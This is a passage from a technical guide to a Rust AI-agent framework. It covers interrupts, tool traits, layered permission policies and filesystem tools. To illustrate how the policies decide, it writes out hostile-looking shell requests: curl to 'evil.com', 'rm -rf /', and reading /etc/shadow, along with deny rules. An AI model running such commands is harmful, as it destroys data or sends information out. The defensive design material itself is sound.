fn main() {
pub struct InputRequest {
    pub session_id: SessionId,
    pub reason: String,
}
}

The host reads the next user message and submits it:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::AwaitingInput(pending)) => {
    let user_message = read_line()?;
    pending.submit(&mut driver, vec![user_item(user_message)])?;
}
}

This is the most common interrupt in an interactive session. The pattern is: model finishes → host gets AwaitingInput → host reads user input → host calls submit → host calls next() → loop runs another turn.

After-tool-result yields

A single user message can drive many tool rounds before the model produces a final reply. Between each round — after every tool call in the previous assistant message has a matching tool result in the transcript, and before the driver invokes the model again — the loop yields control to the host:

#![allow(unused)]
fn main() {
pub struct ToolRoundInfo {
    pub session_id:     SessionId,
    pub turn_id:        TurnId,
    pub transcript_len: usize,
}
}

Unlike approval, this yield requires no resolution. The host has three choices:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::AfterToolResult(info)) => {
    // 1. Ignore: just loop back to next().  The turn resumes with the
    //    existing transcript into the next model call.
    // 2. Interject: submit a user message that the next model call will
    //    see as part of the transcript.
    info.submit(&mut driver, vec![Item::text(ItemKind::User, "also: be concise")])?;
    // 3. Cancel: call cancellation.interrupt() and then drain the turn.
}
}

The invariant maintained at this point is that the transcript ends in a valid […, assistant(tool_call…), tool_result(…)] sequence — adding a user message here produces […, tool_call, tool_result, user] which every major provider accepts as the prompt for the next assistant response.

Why yield if resolution is optional?

Interactive agents frequently need to let the user type ahead during a slow turn (“wait, also be concise”, “actually, skip the benchmarks”). Without a yield point, the only ways to interject are:

cancel the whole turn and restart with the combined message — loses progress and burns tokens;
inject into the next TurnRequest.transcript via a ModelAdapter wrapper — works, but requires a parallel buffer and post-turn reconciliation with the driver’s own transcript;
hold the driver under a mutex and submit input from another task — violates the &mut self invariant and requires unsafe or a lock wrapper.

AfterToolResult solves this natively: the driver is not mid-next() at the yield, so info.submit(&mut driver, items) is callable in the normal way, and the transcript the model sees is always the single canonical one owned by the driver. The handle is consumed when used, so the same yield cannot accept input twice.

Hosts that don’t care about interjection

Non-interactive callers (batch jobs, tests, subagents) match the arm with continue:

#![allow(unused)]
fn main() {
loop {
    match driver.next().await? {
        LoopStep::Interrupt(LoopInterrupt::AfterToolResult(_)) => continue,
        LoopStep::Finished(result) => break handle_result(result),
        // …blocking interrupts handled as usual
    }
}
}

Interrupt ordering and state safety

The driver enforces strict state transitions:

Valid transitions:

  Agent::builder()
    .transcript(prior)        // optional, default empty
    .input(opening_turn)      // optional, default empty
    .build()?
    .start(cfg)         ──▶ next() ──▶ Interrupt(Awaiting)        ──▶ req.submit(driver, first_input)   ──▶ next()
                                                  ──▶ Finished
                                                  ──▶ Interrupt(Approval)        ──▶ pending.approve/deny()  ──▶ next()
                                                  ──▶ Interrupt(AfterToolResult) ──▶ [info.submit(driver, …)] ──▶ next()
                                                                                    (submit is optional)

Invalid (state errors):

  next() while an approval is pending                    → LoopError::InvalidState
  resolve_approval() with no pending approval            → LoopError::InvalidState
  resolve_approval() for a ToolCallId that doesn't exist → LoopError::InvalidState

Blocking interrupts (ApprovalRequest) must be resolved before next() can run again; calling next() with an unresolved approval returns LoopError::InvalidState. Cooperative interrupts (AwaitingInput, AfterToolResult) impose no such constraint — the host calls next() when ready, with or without an intervening submit. These constraints prevent subtle bugs where the host accidentally skips or duplicates a resolution that actually matters.

The event/interrupt duality

Some actions are reported both as non-blocking observations and as blocking interrupts:

Observer receives	Host receives
`AgentEvent::ApprovalRequired(req)`	`LoopStep::Interrupt(ApprovalRequest(pending))`
`AgentEvent::TurnFinished(result)`	`LoopStep::Finished(result)`

This duplication is intentional. The event is for observability — a reporter logs it, a UI updates a status indicator. The interrupt is for control flow — the host must answer it before the loop can continue. These are different concerns served by different mechanisms.

A reporter that displays “Waiting for approval…” needs the event. The host code that prompts the user needs the interrupt. Neither should have to reach into the other’s channel.

Practical patterns

Auto-approve by policy

If your permission policy already knows which operations are safe, it returns Allow instead of RequireApproval. The loop never interrupts for those operations. Configure your policies conservatively and expand allowlists as you build confidence.

Session-scoped approvals

A host can maintain a session-local allowlist. When the user approves a command like cargo build, add it to the allowlist. On subsequent approval interrupts, check the allowlist before prompting:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
    if session_allowlist.contains(&pending.request.request_kind) {
        pending.approve(&mut driver)?;
    } else {
        let decision = prompt_user(&pending.request)?;
        if decision == "always" {
            session_allowlist.insert(pending.request.request_kind.clone());
        }
        // resolve based on decision
    }
}
}

Headless operation

For non-interactive agents (CI, background jobs), either configure permissive policies or auto-approve everything:

#![allow(unused)]
fn main() {
LoopStep::Interrupt(LoopInterrupt::ApprovalRequest(pending)) => {
    pending.approve(&mut driver)?;
}
}

The approval system still runs — it’s just that the policy answers “yes” to everything. The events are still emitted, so audit logging captures every approved operation.

Example: openrouter-coding-agent handles approval interrupts for filesystem writes in its main loop.

Crate: agentkit-loop — LoopStep, LoopInterrupt, PendingApproval, InputRequest, ToolRoundInfo. Approval types come from agentkit-tools-core; MCP AuthRequest / AuthResolution live in agentkit-mcp.

The capability layer

Before we discuss tools, we need to understand the abstraction they build on. agentkit-capabilities defines a lower-level interoperability layer for anything a model can interact with: operations it can invoke, data it can read, and prompt templates it can use.

Why a layer beneath tools

The current design has three external capability shapes:

Invocables — named request/response operations (tools, MCP tools, custom operations)
Resources — named data blobs that can be listed and read (files, database rows, API responses)
Prompts — parameterized templates that produce conversation items

Native tools and MCP tools are both invocable operations. But MCP also exposes resources and prompts, which are not tools. Forcing everything through a Tool trait would distort the model — reading a resource is not a tool call, and rendering a prompt template is not tool execution.

Without a capability layer:

  Tool trait ◀── native tools
             ◀── MCP tools (fit naturally)
             ◀── MCP resources (forced into tool shape — read_resource "tool")
             ◀── MCP prompts (forced into tool shape — render_prompt "tool")

  Everything is a tool. But reading a resource has no side effects,
  no permission model, and no schema. Wrapping it as a "tool" adds
  complexity without adding value.


With a capability layer:

  Invocable  ◀── native tools (via Tool → Invocable bridge)
             ◀── MCP tools (via McpToolAdapter)

  ResourceProvider ◀── MCP resources
                   ◀── custom data sources

  PromptProvider   ◀── MCP prompts
                   ◀── custom template engines

  Each shape gets the right abstraction. No forced fitting.

The capability layer gives MCP, tools, and future integrations one shared vocabulary without pretending everything is the same thing.

Invocable

The core trait for anything the model can call:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Invocable: Send + Sync {
    fn spec(&self) -> &InvocableSpec;
    async fn invoke(
        &self,
        request: InvocableRequest,
        ctx: &mut CapabilityContext<'_>,
    ) -> Result<InvocableResult, CapabilityError>;
}
}

An InvocableSpec carries the name, description, and JSON Schema for the input — enough information to present the capability to a model:

#![allow(unused)]
fn main() {
pub struct InvocableSpec {
    pub name: CapabilityName,
    pub description: String,
    pub input_schema: Value,       // JSON Schema object
    pub metadata: MetadataMap,
}
}

The request carries the model’s input arguments plus session context:

#![allow(unused)]
fn main() {
pub struct InvocableRequest {
    pub input: Value,
    pub session_id: Option<SessionId>,
    pub turn_id: Option<TurnId>,
    pub metadata: MetadataMap,
}
}

And the result supports multiple return shapes:

#![allow(unused)]
fn main() {
pub struct InvocableResult {
    pub output: InvocableOutput,
    pub metadata: MetadataMap,
}

pub enum InvocableOutput {
    Text(String),             // Plain text response
    Structured(Value),        // JSON value
    Items(Vec<Item>),         // Conversation items (for prompts, multi-part results)
    Data(DataRef),            // Binary or referenced data
}
}

Invocable vs Tool

Invocable is deliberately thinner than Tool:

`Invocable`	`Tool`
`spec: InvocableSpec`	`spec: ToolSpec` (adds annotations)
`invoke(request, CapabilityContext)`	`invoke(request, ToolContext)`
	`proposed_requests()` (preflight)
	`ToolAnnotations` (read_only, destructive, …)
	`ToolContext` (permissions, resources, cancellation)

An Invocable knows its name, description, schema, and how to execute. A Tool adds permission semantics, behavioural hints, and a richer execution context. Tools are invocables with opinions about safety.

Resources and prompts

#![allow(unused)]
fn main() {
#[async_trait]
pub trait ResourceProvider: Send + Sync {
    async fn list_resources(&self) -> Result<Vec<ResourceDescriptor>, CapabilityError>;
    async fn read_resource(&self, id: &ResourceId, ctx: &mut CapabilityContext<'_>)
        -> Result<ResourceContents, CapabilityError>;
}
}

Resources are named data blobs. They have an ID, a name, an optional description and MIME type. Reading them returns a DataRef — the content might be inline text, inline bytes, or a URI:

#![allow(unused)]
fn main() {
pub struct ResourceDescriptor {
    pub id: ResourceId,
    pub name: String,
    pub description: Option<String>,
    pub mime_type: Option<String>,
    pub metadata: MetadataMap,
}

pub struct ResourceContents {
    pub data: DataRef,
    pub metadata: MetadataMap,
}
}

Prompts are parameterized templates that produce conversation items:

#![allow(unused)]
fn main() {
#[async_trait]
pub trait PromptProvider: Send + Sync {
    async fn list_prompts(&self) -> Result<Vec<PromptDescriptor>, CapabilityError>;
    async fn get_prompt(&self, id: &PromptId, args: Value, ctx: &mut CapabilityContext<'_>)
        -> Result<PromptContents, CapabilityError>;
}
}

A prompt descriptor carries a JSON Schema for its arguments:

#![allow(unused)]
fn main() {
pub struct PromptDescriptor {
    pub id: PromptId,
    pub name: String,
    pub description: Option<String>,
    pub input_schema: Value,
    pub metadata: MetadataMap,
}

pub struct PromptContents {
    pub items: Vec<Item>, // Rendered conversation items
    pub metadata: MetadataMap,
}
}

These are separate traits, not specializations of Invocable. The type system enforces the distinction — you can’t accidentally pass a ResourceProvider where an Invocable is expected.

Capability type	Model interaction	Side effects	Permission model
`Invocable`	Model calls it	May have	Full tool permissions
`ResourceProvider`	Host reads, injects	Read-only	Simpler (list + read)
`PromptProvider`	Host renders, injects	None	None (templates only)

CapabilityProvider

Many integrations expose multiple capability kinds. The CapabilityProvider trait bundles them:

#![allow(unused)]
fn main() {
pub trait CapabilityProvider: Send + Sync {
    fn invocables(&self) -> Vec<Arc<dyn Invocable>>;
    fn resources(&self) -> Vec<Arc<dyn ResourceProvider>>;
    fn prompts(&self) -> Vec<Arc<dyn PromptProvider>>;
}
}

An MCP server implements CapabilityProvider to expose its tools, resources, and prompts through one registration point:

MCP server "github"
  │
  ├── invocables:  [search_issues, create_pr, merge_pr]
  ├── resources:   [repo_readme, issue_list, pr_diff]
  └── prompts:     [code_review_prompt, bug_report_template]
       │
       ▼
  CapabilityProvider::invocables()  → Vec<Arc<dyn Invocable>>
  CapabilityProvider::resources()   → Vec<Arc<dyn ResourceProvider>>
  CapabilityProvider::prompts()     → Vec<Arc<dyn PromptProvider>>

The loop collects all capability providers and merges their invocables into the unified tool list presented to the model. Resources and prompts flow through separate paths — they’re typically consumed by the context loader or the host, not directly by the model.

CapabilityContext

#![allow(unused)]
fn main() {
pub struct CapabilityContext<'a> {
    pub session_id: Option<&'a SessionId>,
    pub turn_id: Option<&'a TurnId>,
    pub metadata: &'a MetadataMap,
}
}

This is a minimal context passed to all capability invocations. It carries enough to correlate work with a session and turn, but not enough to reach into the loop or modify the transcript.

The tool layer wraps this in a richer ToolContext that adds permission checking, shared resources, and cancellation:

`CapabilityContext` (lean)	`ToolContext` (rich)
`session_id`	`capability: CapabilityContext`
`turn_id`	`permissions: &dyn PermissionChecker`
`metadata`	`resources: &dyn ToolResources`
	`cancellation: Option<TurnCancellation>`

The capability layer doesn’t know about permissions or cancellation. These are tool-layer concerns, added by the ToolContext wrapper.

Error handling

All capability traits use a single error type:

#![allow(unused)]
fn main() {
pub enum CapabilityError {
    Unavailable(String),     // Capability not found or offline
    InvalidInput(String),    // Arguments failed validation
    ExecutionFailed(String), // Runtime failure
}
}

This is intentionally coarse-grained. The capability layer doesn’t try to enumerate every failure mode — it provides three buckets that cover the meaningful distinctions: “doesn’t exist”, “bad input”, and “broken at runtime”. Downstream layers (tools, MCP) add their own error types when finer granularity is needed.

Positioning

This layer is public and extensible, but it is not the primary extension point for most users. The intended guidance:

“I want to…”	Implement…
Add a custom tool that the model can call	`Tool` trait (ch09)
Expose data for context loading	`ResourceProvider`
Expose parameterized prompt templates	`PromptProvider`
Integrate an MCP server	`CapabilityProvider` (ch17)
Build something that doesn’t fit above	`Invocable` directly

Most users implement Tool. The capability traits matter when you’re integrating MCP servers, building custom data sources, or working on the framework itself.

Crate: agentkit-capabilities — depends only on agentkit-core. No runtime dependencies, no async runtime requirements beyond the traits themselves.

Designing a tool system

This chapter covers agentkit-tools-core: the tool execution contract that connects the loop to actual functionality. We’ll walk through the design decisions behind tool specs, the registry, the executor, and how tools bridge to the capability layer underneath.

The tool trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Tool: Send + Sync {
    fn spec(&self) -> &ToolSpec;
    async fn invoke(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> Result<ToolResult, ToolError>;

    // Optional. Default delegates to `invoke` and folds `Result` into
    // `ToolExecutionOutcome::Completed` / `::Failed`.
    async fn invoke_outcome(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> ToolExecutionOutcome { /* ... */ }
}
}

A tool has two concerns: description and execution. The spec() method returns the model-facing description. The invoke() method does the work. Tools that compose other tools (see agentkit-tool-compose) can override invoke_outcome instead, so a nested approval interruption propagates back to the loop as ToolExecutionOutcome::Interrupted rather than collapsing into an error.

ToolSpec

#![allow(unused)]
fn main() {
pub struct ToolSpec {
    pub name: ToolName,
    pub description: String,
    pub input_schema: Value,
    pub output_schema: Option<Value>,
    pub annotations: ToolAnnotations,
    pub metadata: MetadataMap,
}
}

output_schema is the JSON Schema describing what the tool returns. Provider tool-call APIs (Anthropic, OpenAI, Gemini) don’t carry an output schema in their declarations, so it is not forwarded verbatim to the model. Hosts may render it into the description, and composing tools (e.g. agentkit-tool-compose) surface it so a generated script can target the correct return shape on the first try. Set it on a spec with ToolSpec::with_output_schema(schema).

ToolAnnotations carry behavioral hints:

#![allow(unused)]
fn main() {
pub struct ToolAnnotations {
    pub read_only_hint: bool,
    pub destructive_hint: bool,
    pub idempotent_hint: bool,
    pub needs_approval_hint: bool,
    pub supports_streaming_hint: bool,
}
}

These are hints, not guarantees. The actual enforcement comes from the permission system. But they’re useful for model guidance, UI presentation, and default policy decisions.

ToolRequest and ToolResult

#![allow(unused)]
fn main() {
pub struct ToolRequest {
    pub call_id: ToolCallId,
    pub tool_name: ToolName,
    pub input: Value,
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub metadata: MetadataMap,
}
}

The request carries everything the tool needs to execute in context. Session and turn IDs let tools make context-aware decisions without depending on loop internals.

#![allow(unused)]
fn main() {
pub struct ToolResult {
    pub result: ToolResultPart,
    pub duration: Option<Duration>,
    pub metadata: MetadataMap,
}
}

The result wraps a ToolResultPart (from agentkit-core) with execution metadata.

ToolContext

#![allow(unused)]
fn main() {
pub struct ToolContext<'a> {
    pub capability: CapabilityContext<'a>,
    pub permissions: &'a dyn PermissionChecker,
    pub resources: &'a dyn ToolResources,
    pub cancellation: Option<TurnCancellation>,
    pub execution_scope: Option<ToolExecutionScope>,
    pub approved_request: Option<ApprovalRequest>,
}
}

The context gives tools access to permissions, shared resources (like filesystem policy state), and cancellation. Tools don’t reach into the loop — they get a narrow execution context.

execution_scope is the owned handle a composing tool uses to invoke other tools through the same executor, permission checks, and cancellation token. It is None when no scope was installed (older host wiring, raw Invocable adapters). When present, scope.execute_child(request) and scope.execute_approved_child(request, approval) return ToolExecutionOutcome directly — so nested approval interrupts propagate out via invoke_outcome instead of being collapsed.

approved_request is the ApprovalRequest currently being resumed when the invocation is the result of host approval. Tools that need to know “is this an approval resume?” can read it; the executor sets and restores it automatically across the execute_approved path.

The registry

#![allow(unused)]
fn main() {
pub struct ToolRegistry {
    tools: BTreeMap<ToolName, Arc<dyn Tool>>,
}
}

The registry is simple: register tools, look them up by name, iterate specs. It uses BTreeMap for deterministic ordering.

#![allow(unused)]
fn main() {
let registry = ToolRegistry::new()
    .with(ReadFileTool::default())
    .with(WriteFileTool::default())
    .with(ShellExecTool::default());
}

The builder pattern via .with() makes registration ergonomic. Registries from different tool crates can be merged:

#![allow(unused)]
fn main() {
let registry = agentkit_tool_fs::registry()
    .merge(agentkit_tool_shell::registry());
}

The executor

The loop doesn’t call tools directly. It goes through a ToolExecutor:

#![allow(unused)]
fn main() {
pub trait ToolExecutor {
    async fn execute(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> ToolExecutionOutcome;
}
}

The executor handles:

Registry lookup
Permission preflight
Approval determination
Tool invocation
Error normalization

This centralized layer is where safety logic lives, rather than being duplicated in every tool.

Execution outcomes

#![allow(unused)]
fn main() {
pub enum ToolExecutionOutcome {
    Completed(ToolResult),
    Interrupted(ToolInterruption),
    Failed(ToolError),
}

pub enum ToolInterruption {
    ApprovalRequired(ApprovalRequest),
}
}

Not every execution failure is an error. An approval-required outcome means the tool is valid but needs human confirmation. The loop translates this into a LoopStep::Interrupt(ApprovalRequest(...)). Auth challenges are not modelled as a ToolInterruption — MCP-backed tools surface them as ToolError::AuthRequired(AuthRequest) and the host completes the flow out-of-band via McpServerManager::resolve_auth.

Preflight permission requests

Tools can expose what they plan to do before execution by overriding proposed_requests on the Tool trait:

#![allow(unused)]
fn main() {
fn proposed_requests(
    &self,
    request: &ToolRequest,
) -> Result<Vec<Box<dyn PermissionRequest>>, ToolError> {
    Ok(Vec::new()) // default: no permissions needed
}
}

This lets the executor inspect and evaluate permission requests before any side effects occur. This is especially important for shell commands and filesystem writes — you want to check policy before running rm -rf, not after.

Bridging to capabilities

ToolCapabilityProvider wraps a ToolRegistry as a CapabilityProvider, making every registered tool available as an Invocable. This is how the loop presents tools to the model alongside MCP-backed capabilities through a single unified list.

The execution flow

Putting it all together — here’s the complete path from model tool call to result:

Model emits ToolCallPart
       │
       ▼
┌──────────────────────────────────┐
│  ToolExecutor                    │
│                                  │
│  1. Registry lookup              │
│     ToolName → Arc<dyn Tool>     │
│     └── not found → ToolError    │
│                                  │
│  2. Preflight                    │
│     tool.proposed_requests()     │
│     → Vec<PermissionRequest>     │
│                                  │
│  3. Permission evaluation        │
│     for each PermissionRequest:  │
│     checker.evaluate(req)        │
│     ├── Allow → continue         │
│     ├── Deny → stop, return err  │
│     └── RequireApproval → stop,  │
│         return ToolInterruption  │
│                                  │
│  4. Invocation                   │
│     tool.invoke(request, ctx)    │
│     → ToolResult                 │
│                                  │
│  5. Error normalization          │
│     ToolError → ToolResult       │
│     with ToolResultPart          │
│     { is_error: true }           │
└──────────────────────────────────┘
       │
       ▼
ToolExecutionOutcome::Completed(ToolResult)

Tool errors (file not found, invalid JSON, network failure) are normalized into a ToolResult whose ToolResultPart has is_error: true — the model sees the error message as a tool result and can decide to retry, try differently, or report the failure. Errors don’t crash the loop or propagate to the host.

Design decisions

Why separate Tool from Invocable?

Tools add model-facing schema and permission semantics on top of the base invocable contract. A raw Invocable doesn’t have annotations, preflight actions, or a permission context. Tools are a specialization, not the lowest layer.

Why ToolName as a newtype?

ToolName prevents accidental confusion with other string identifiers. It also centralizes validation and supports namespacing conventions like fs_read_file or mcp.github.search.

Why JSON Schema for input?

Explicit JSON Schema keeps the tool contract provider-neutral. Tools don’t depend on derive macros or schema generation libraries that might not match every provider’s expectations. The schema is a JSON Value — any valid JSON Schema works:

#![allow(unused)]
fn main() {
input_schema: json!({
    "type": "object",
    "properties": {
        "path": { "type": "string", "description": "File path to read" },
        "from": { "type": "integer", "description": "Start line (optional)" },
        "to": { "type": "integer", "description": "End line (optional)" }
    },
    "required": ["path"]
})
}

If ergonomic schema helpers are needed later (derive macros, builder APIs), they can be added as optional companions without changing the base contract.

Why `BTreeMap` for the registry?

ToolRegistry uses BTreeMap<ToolName, Arc<dyn Tool>> rather than HashMap for deterministic tool ordering. When the model receives the tool list, the order is always the same — this matters for reproducibility and for providers that may be sensitive to tool ordering in the prompt.

Crate: agentkit-tools-core — depends on agentkit-capabilities and agentkit-core.

Permissions, approvals, and auth

Safety is the hardest problem in agent frameworks. An agent with shell access can delete your home directory. An agent with network access can exfiltrate data. The permission system is how you prevent this without making the agent useless.

This chapter covers the permission model, policy composition, and approval flow.

The ternary decision model

A permission check produces one of three outcomes:

#![allow(unused)]
fn main() {
pub enum PermissionDecision {
    Allow,
    Deny(PermissionDenial),
    RequireApproval(ApprovalRequest),
}
}

This is not a boolean. The third outcome — “this might be okay, but a human needs to confirm” — is essential for practical agent use. Categorically denying all writes makes the agent unable to code. Categorically allowing all writes makes it dangerous. Requiring approval for writes outside the workspace is the useful middle ground.

Permission requests

Policy is evaluated against a description of the proposed action, not against tool implementation details:

#![allow(unused)]
fn main() {
pub trait PermissionRequest: Send + Sync {
    fn kind(&self) -> &'static str;
    fn summary(&self) -> String;
    fn metadata(&self) -> &MetadataMap;
    fn as_any(&self) -> &dyn Any;
}
}

Built-in request types cover common scenarios:

ShellPermissionRequest — executable, argv, cwd, env keys, timeout
FileSystemPermissionRequest — Read, Write, Edit, Delete, Move, List, CreateDir
McpPermissionRequest — Connect, InvokeTool, ReadResource, FetchPrompt, UseAuthScope

Custom tools can define their own request types by implementing the trait directly. This makes custom tools first-class — they don’t have to squeeze into a generic Custom { kind, payload } variant.

The permission checker

#![allow(unused)]
fn main() {
pub trait PermissionChecker: Send + Sync {
    fn evaluate(&self, request: &dyn PermissionRequest) -> PermissionDecision;
}
}

This is synchronous by design. Permission checks should be local and cheap. If a host needs external policy engines, they can build an adapter, but the base contract stays simple.

Policy composition

Real hosts need layered rules. A single monolithic checker doesn’t scale — you want separate rules for paths, commands, MCP servers, and custom actions, each maintained independently.

#![allow(unused)]
fn main() {
pub struct CompositePermissionChecker {
    policies: Vec<Box<dyn PermissionPolicy>>,
    fallback: PermissionDecision,
}
}

Each policy returns PolicyMatch — note the fourth option that PermissionDecision doesn’t have:

#![allow(unused)]
fn main() {
pub enum PolicyMatch {
    NoOpinion,                    // "I don't handle this kind of request"
    Allow,
    Deny(PermissionDenial),
    RequireApproval(ApprovalRequest),
}
}

NoOpinion is what makes composition work. A PathPolicy returns NoOpinion for shell commands because it only understands filesystem paths. A CommandPolicy returns NoOpinion for filesystem operations. Each policy handles its domain and defers on everything else.

The evaluation algorithm:

for each policy in registration order:
  match policy.evaluate(request):
    NoOpinion         → continue to next policy
    Allow             → record "saw allow", continue
    Deny(reason)      → STOP, return Deny immediately
    RequireApproval   → record it, continue

after all policies:
  if any Deny was seen     → return Deny         (already returned above)
  if any RequireApproval   → return RequireApproval
  if any Allow             → return Allow
  otherwise                → return fallback

Precedence rules:

Explicit deny wins — a single Deny short-circuits immediately
Require-approval wins over allow — if any policy says “ask the user”, the user is asked
Allow wins over no-opinion — at least one policy must explicitly allow
Fallback applies if no policy matches — configurable (typically Deny)

Built-in policies

PathPolicy — workspace root allowlists, protected path denylists, read-only subtrees
CommandPolicy — executable allowlists/denylists, cwd restrictions, env var restrictions
McpServerPolicy — trusted server allowlists, auth-scope restrictions
CustomKindPolicy — handles custom tool action kinds

Composing policies — a practical example

#![allow(unused)]
fn main() {
let checker = CompositePermissionChecker::new(PermissionDecision::Deny(default_denial()))
    .with_policy(PathPolicy::new()
        .allow_root("/workspace")
        .read_only_root("/workspace/vendor")
        .protect_root("/workspace/.env")
        .protect_root("/workspace/secrets/"))
    .with_policy(CommandPolicy::new()
        .allow_executable("git")
        .allow_executable("cargo")
        .allow_executable("rustc")
        .deny_executable("rm")
        .require_approval_for_unknown(true))
    .with_policy(McpServerPolicy::new()
        .allow_server("github"));
}

Trace through some requests with this configuration:

Request: FileSystem::Read("/workspace/src/main.rs")
  PathPolicy:    /workspace is allowed root → Allow
  CommandPolicy: NoOpinion (not a shell request)
  McpPolicy:     NoOpinion (not an MCP request)
  Result: Allow ✓

Request: FileSystem::Write("/workspace/.env")
  PathPolicy:    /workspace/.env is denied → Deny
  Result: Deny ✗ (short-circuit)

Request: FileSystem::Edit("/workspace/vendor/lib.rs")
  PathPolicy:    /workspace/vendor is read-only → Deny
  Result: Deny ✗ (short-circuit)

Request: Shell("curl", ["https://evil.com"])
  PathPolicy:    NoOpinion (not a filesystem request)
  CommandPolicy: "curl" is unknown, require_approval_for_unknown → RequireApproval
  McpPolicy:     NoOpinion
  Result: RequireApproval ⚠

Request: Shell("rm", ["-rf", "/"])
  PathPolicy:    NoOpinion
  CommandPolicy: "rm" is denied → Deny
  Result: Deny ✗ (short-circuit)

Request: Custom("deploy", {...})
  PathPolicy:    NoOpinion
  CommandPolicy: NoOpinion
  McpPolicy:     NoOpinion
  No policy matched → fallback: Deny ✗

Execution integration

The permission flow integrates with tool execution:

Tool receives a request
Tool exposes preflight PermissionRequest values
Executor evaluates each request through the permission checker
If any are denied → execution stops with a structured denial
If any require approval → execution stops with an interrupt
Otherwise → the tool executes

Multiple actions per tool call are evaluated together: if any deny, the whole call is denied. If any require approval, the whole call is interrupted. This is conservative by design.

Approval vs denial

The distinction matters:

Deny when an action is categorically disallowed: rm -rf /, reading /etc/shadow
Require approval when an action is risky but may be legitimate: writing outside the workspace, connecting to an unknown MCP server

Hosts should set this calibration through their policy configuration, not through agentkit defaults.

Custom permission requests

#![allow(unused)]
fn main() {
pub struct DeployPermissionRequest {
    pub environment: String,
    pub service: String,
    pub metadata: MetadataMap,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str { "myapp.deploy" }
    fn summary(&self) -> String {
        format!("Deploy {} to {}", self.service, self.environment)
    }
    // ...
}
}

Generic policies operate on kind() and metadata. Specialized host policies can downcast through as_any() for richer handling. This layering lets custom tools participate in the permission system without compromising on type safety.

Crate: Permission types live in agentkit-tools-core. Built-in policies are in the same crate. Tool crates like agentkit-tool-fs and agentkit-tool-shell define their specific request types.

Filesystem tools

A coding agent needs to read, write, and navigate files. This chapter covers agentkit-tool-fs: the built-in filesystem tools and their session-scoped safety policies.

The tool set

agentkit-tool-fs ships seven tools:

Tool	Description	Annotations
`fs_read_file`	Read file contents with optional line ranges	`read_only`
`fs_write_file`	Write or overwrite a file	`destructive`
`fs_replace_in_file`	Find-and-replace within a file	`destructive`
`fs_move`	Rename or move a file	`destructive`
`fs_delete`	Delete a file	`destructive`
`fs_list_directory`	List directory contents	`read_only`
`fs_create_directory`	Create a directory	—

All tools implement the Tool trait and can be registered with a single call:

#![allow(unused)]
fn main() {
let registry = agentkit_tool_fs::registry();
}

Read-before-write enforcement

The most important safety feature in the filesystem tools is FileSystemToolPolicy:

#![allow(unused)]
fn main() {
let resources = FileSystemToolResources::new()
    .with_policy(
        FileSystemToolPolicy::new()
            .require_read_before_write(true),
    );
}

When enabled, the policy tracks which files have been read in the current session. A write or replace operation on a file that hasn’t been read first is denied. This prevents the model from blindly overwriting files it hasn’t seen — a surprisingly common failure mode.

The tracking state lives in FileSystemToolResources, which implements the ToolResources trait and is passed to tools through ToolContext.

Permission preflight

Every filesystem tool emits a FileSystemPermissionRequest before execution:

#![allow(unused)]
fn main() {
pub enum FileSystemPermissionRequest {
    Read { path: PathBuf },
    Write { path: PathBuf },
    Edit { path: PathBuf },
    Delete { path: PathBuf },
    Move { from: PathBuf, to: PathBuf },
    List { path: PathBuf },
    CreateDir { path: PathBuf },
}
}

These structured requests let PathPolicy make informed decisions:

Allow reads under the workspace root
Require approval for writes outside the workspace
Deny deletes of protected paths

Read-before-write: why it matters

Without this policy, the model can — and routinely does — overwrite files it hasn’t seen. The typical failure mode:

Without read-before-write:

  User: "Add error handling to parser.rs"
  Model: ToolCall(fs_write_file, { path: "src/parser.rs", content: "... entirely new file ..." })

  The model hallucinated the file contents. The original code is gone.
  Any code that wasn't in the model's context window is lost.


With read-before-write:

  User: "Add error handling to parser.rs"
  Model: ToolCall(fs_write_file, { path: "src/parser.rs", content: "..." })
  → Denied: "src/parser.rs has not been read in this session"

  Model: ToolCall(fs_read_file, { path: "src/parser.rs" })
  → Success: file contents returned

  Model: ToolCall(fs_replace_in_file, { path: "src/parser.rs", find: "...", replace: "..." })
  → Success: targeted edit

The policy is session-scoped — the tracker resets when a new session starts. Reading a file once unlocks writes and edits to it for the remainder of the session.

Implementation patterns

`fs_read_file`

Accepts a path and optional from/to line numbers. Returns the file contents as text. Records the path as “read” in FileSystemToolResources for read-before-write tracking.

Line range support lets the model read specific sections of large files without consuming the entire context window:

fs_read_file({ path: "src/main.rs", from: 50, to: 75 })
→ Returns lines 50-75 only

`fs_replace_in_file`

Accepts a path, find, replace, and an optional replace_all boolean. Reads the file, performs the replacement, writes the result. This is the primary editing tool — it’s more precise than full-file writes because the model only needs to specify the changed region.

The replacement is exact string matching, not regex. If the search text doesn’t appear in the file, the tool returns an error. When replace_all is false (the default), only the first occurrence is replaced — this avoids accidental mass edits.

`fs_write_file`

Writes or overwrites an entire file. Subject to read-before-write policy for existing files. New files (that don’t exist yet) can be written without a prior read.

`fs_list_directory`

Returns the contents of a directory. Useful for the model to explore project structure before reading specific files. Returns filenames and basic metadata (file vs directory, size).

Error handling

Filesystem errors (file not found, permission denied, etc.) are returned as a ToolResult whose ToolResultPart has is_error: true. They are not panics or exceptions. The model sees the error message and can decide what to do — try a different path, ask the user, or give up.

Error flow:

  fs_read_file({ path: "nonexistent.rs" })
  → ToolResult { result: ToolResultPart { is_error: true, output: "File not found: nonexistent.rs", .. }, .. }
  → Model: "The file doesn't exist. Let me check the directory structure..."
  → fs_list_directory({ path: "src/" })
  → Model finds the correct file name and retries

This is a key design principle: tool errors are part of the conversation, not exceptions. The model can reason about errors and recover, which is essential for autonomous operation.

Example: openrouter-coding-agent uses the full filesystem registry to read, edit, and write files in a one-shot coding task.

Crate: agentkit-tool-fs — depends on agentkit-tools-core and agentkit-core.

Shell execution

Shell access is the most powerful and most dangerous tool an agent can have. This chapter covers agentkit-tool-shell, its safety boundaries, and how it integrates with cancellation and timeouts.

ShellExecTool

The crate provides a single tool: shell_exec.

#![allow(unused)]
fn main() {
let registry = agentkit_tool_shell::registry();
}

